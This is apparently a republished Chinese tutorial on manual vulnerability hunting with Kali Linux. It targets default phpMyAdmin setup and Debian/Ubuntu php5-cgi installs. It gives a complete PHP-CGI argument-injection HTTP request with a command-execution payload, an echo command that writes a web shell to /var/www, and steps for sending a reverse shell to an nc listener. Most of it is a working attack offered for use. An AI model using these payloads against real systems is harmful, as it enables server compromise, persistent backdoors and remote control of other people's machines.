kali linux之手動漏洞挖掘一


默認安裝漏洞

phpmyadmin/setup默認安裝

ubuntu/debian默認安裝php5-cgi

 

phpmyadmin/setup默認安裝

 

使用?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1對php.ini文件做試探)

POSThttp://192.168.1.12/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.1.12
Content-Length: 34
 
<?php
passthru('id'); ##使用passthru函數,執行命令,比如ls,cat等,如果可以執行,也可以寫一句話木馬進去
die(); ##die函數,不執行以下的操作
?>

點擊那個筆,把設置好對應的端口

點擊go,帳號就顯示出來了(www權限)

pwd命令

 

寫入網頁木馬

echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" >/var/www/xxsec.php

寫好木馬后即可執行命令

 

 

反彈shell

 

把php-reverse-shell.php拷貝到其他目錄,然后編輯它,把ip地址變成攻擊機

編輯后保存,把內容發送到目標機器上(因為它是反彈鏈接,所以發送前,先用nc監聽好端口)

我反彈shell上的反彈的1234端口,用nc監聽1234端口,發送后就會反彈到nc會話

 

 

 

ubuntu/debian默認安裝php5-cgi,可以直接訪問/cgi-bin/php5和cgi-bin/php(這個目錄是爬不出來的)

-d allow_url_in clude=on -d safe_mode= off -d suhosin.simul ation=on -d disa

把這些代碼復制到burp編碼為url,否則執行不了,

這里的host主機頭必須有,使用system函數執行命令<?php echo system('id'); die(); ?>

查看所有用戶信息

也可以讓主機監聽一個端口,我們用nc連接這個端口,但是可能會被防火牆攔

 

 

友情鏈接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM